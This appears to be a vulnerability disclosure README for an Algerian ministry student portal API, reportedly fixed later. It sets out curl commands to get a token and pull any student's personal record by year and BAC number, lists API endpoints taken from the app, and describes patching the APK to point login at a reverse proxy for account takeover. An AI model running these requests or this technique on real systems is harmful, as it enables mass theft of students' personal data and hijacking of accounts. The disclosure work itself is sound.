In this repository, I will explain how the exploit behind the ministry's students portal exploit works and how can attackers access mostly all data of students from all university and superior schools.
Important
This vulnerability seems to be fixed after 1 year of reporting it, making it use UUIDs instead of year & numerical ID and the API url changed to https://api-webetu.mesrs.dz/ An article about it was published in https://akraml.com/article/1
I guess everyone noticed that WebEtu application is laggy and very buggy. So, after some investigation I've noticed that the data in the app is not being saved properly since they're all combined into 1 JSON string, which will cause in a huge performance impact during I/O operations. After I started rewriting process I've noticed something wrong with the API queries, It just does pass the Student's BAC Number (Matricule) & Student's year, and in some other cases University's ID and goes on. So at this point I stopped the rewrite process and started investigating how does it work and I discovered that after authenticating, the token you received can access mostly if not all api end-points, which exposes all students information.
This exploit works by sending a request to the API Endpoint of authentication: https://progres.mesrs.dz/api/authentication/v1/.
The attacker will send a request with those headers:
Content-Type: application/json, text/plain, */*
User-Agent: okhttp/4.9.2 (Can be any OkHttp version)
Accept-Encoding: gzip
And with JSON data
{
"username": "<progres-username>",
"password": "<progres-password>"
}After sending a proper request, the response should be something like this:
{
"expirationDate": "2024-02-29T10:56:11.424+00:00",
"token": "SECRET-TOKEN",
"userId": 0,
"idIndividu": 0,
"etablissementId": 0,
"userName" :"<progres-username>"
}And here we go, we have finished the first step. And by gaining the token we should have access to almost every endpoint in /api/infos/
Basically, it's either hard-coded or the developer(s) didn't pay attention to this small detail. Any reverse-engineer with basic knowledge can abuse this and gain access to the API endpoint by reverse-engineering the WebEtu application which is available in Play Store & Apple Store.
As we demonstrated before, this exploit can be abused by gathering API token using the authentication endpoint, here is a simple CURL command to explain how to do it:
$ curl -X POST -H 'Content-Type: application/json, text/plain, */*' \
-H 'Accept-Encoding: gzip' \
-H 'User-Agent: okhttp/4.9.2' \
-d '{"username": "<username>", "password": "<password>"}' \
https://progres.mesrs.dz/api/authentication/v1/After executing this command, it should return a json string containing your data:
{
"expirationDate": "2024-02-29T10:56:11.424+00:00",
"token": "SECRET-TOKEN",
"userId": 0,
"idIndividu": 0,
"etablissementId": 0,
"userName" :"<progres-username>"
}But, we are just going to pay attention to the token, since it's all about it.
Here is a list of all accessible endpoints, those URLs are extracted from APK file of WebEtu application in Android platform:
/infos/bac/<T>/<B>/notes (GET)
/infos/demandeTransport/<T>/<B>/<t> (GET)
/infos/bac/<T>/<B>/individu (GET)
/infos/bac/<T>/<B>/dias (GET)
/infos/logoEtablissement/<t> (GET)
/infos/bac/<T>/<B>/anneeAcademique/<t>/dia (GET)
/infos/niveau/<t>/periodes (GET)
/infos/dia/<t>/groups (GET)
/infos/bac/<T>/<B>/dias/<t>/periode/bilans (GET)
/infos/Examens/<t>/niveau/<s>/examens (GET)
/infos/bac/<H>/<k>/dia/<K>/annuel/bilan (GET)
/infos/Examens/<e>/niveau/<n>/examens (GET)
/infos/AnneeAcademiqueEncours (GET)
/infos/bac/<T>/<B> (GET)
/infos/image/<T>/<B> (GET)
/infos/dettes/<T>/<B> (GET)
/infos/congeacademiques/<T>/<B> (GET)
/infos/bac/<T>/<B>/demandesHebregement (GET)
/qitus/<T>/<B>/qitus (GET)
/infos/checkHebregement/<H.id> (GET)
/infos/checkInscription/<H.id> (GET)
/infos/checkTransport/<H.id> (GET)
/infos/offreFormation/<e>/niveau/<Coefficients> (GET)
/infos/controleContinue/dia/<e>/notesCC (GET)
/infos/niveau/<e>/periodes (GET)
/infos/planningSession/dia/<e>/noteExamens (GET)
/infos/offreFormation/<e>/niveau/<n>/planningExamens (GET)
/infos/bac/<H>/<k>/dias/<K>/periode/bilans (GET)
/infos/bac/<H>/<k>/dia/<K>/annuel/bilan (GET)
/infos/Examens/<e>/niveau/<n>/examens (GET)
/authentication/v1/ (POST)
/infos/demanderRenouvellementHebregement/<G>/<N>/<t.id> (POST)
In Chapter 2, we explained how can the attacker retrieve a token and abuse it on his own.
But after gathering the token, you should be able to send requests across the API server.
In this example, we will use CURL with /infos/bac/<T>/<B>/individu/ to explain how it works:
$ curl -X GET -H 'Accept: application/json, text/plain, */*' \
-H 'Accept-Encoding: gzip' \
-H 'User-Agent: okhttp/4.9.2' \
-H 'authorization: <TOKEN HERE>' \
https://progres.mesrs.dz/api/infos/bac/2023/30000000/individuAfter sending a proper request, the result should be like this:
{
"id": 0,
"identifiant": "xxxxxxxx-xxxx-xxxx",
"dateNaissance": "1970-00-00T00:00:00.000+01:00",
"nomArabe": "الإسم الأخير بالعربي",
"nomLatin": "NAME IN LATIN",
"prenomArabe": "الإسم الأول بالعربي",
"prenomLatin": "FIRST NAME IN LATIN",
"lieuNaissance": "Algeirs",
"lieuNaissanceArabe": "الجزائر العاصمة",
"photo": "xxxxx.jpg",
"email": "student@mesrs.dz"
}And here we go, we gathered information of the student we targeted, this also can be automated to scrap data from the api which might cause in a large-wide data breach.
This repository contains the source code of a reverse-proxy which spoofs the authentication process to fake identify and then
gain full access to the target's account.
Source code of the reverse-proxy can be found here
After setting up the server properly, now it should be open in port 1357. We will dump the app into apk file and then modify
assets/index.android.bundle inside the apk file. We need to locate the following string: https://progres.mesrs.dz/api/authentication/v1/
and replace it with our self-hosted reverse proxy. Eg: http://123.45.67.8:1357/api/authentication/v1/.
After doing the following steps and resigning APK file with a new keystore, and after installing the apk in our phone
we can log in into any account we want and gather full control.
The solution is simple, after generating the token you should only give it access to its account, by checking bac id and student's id. I don't know how your backend server is written so I cannot judge at this point. But your developer should understand what I mean.
In the end, we can see how easy is to exploit a vulnerability and abuse it as we want, and also how small bugs can cause large data breaches like what happens in a lot of companies. So the best way is to document the code and also maintaining it periodically.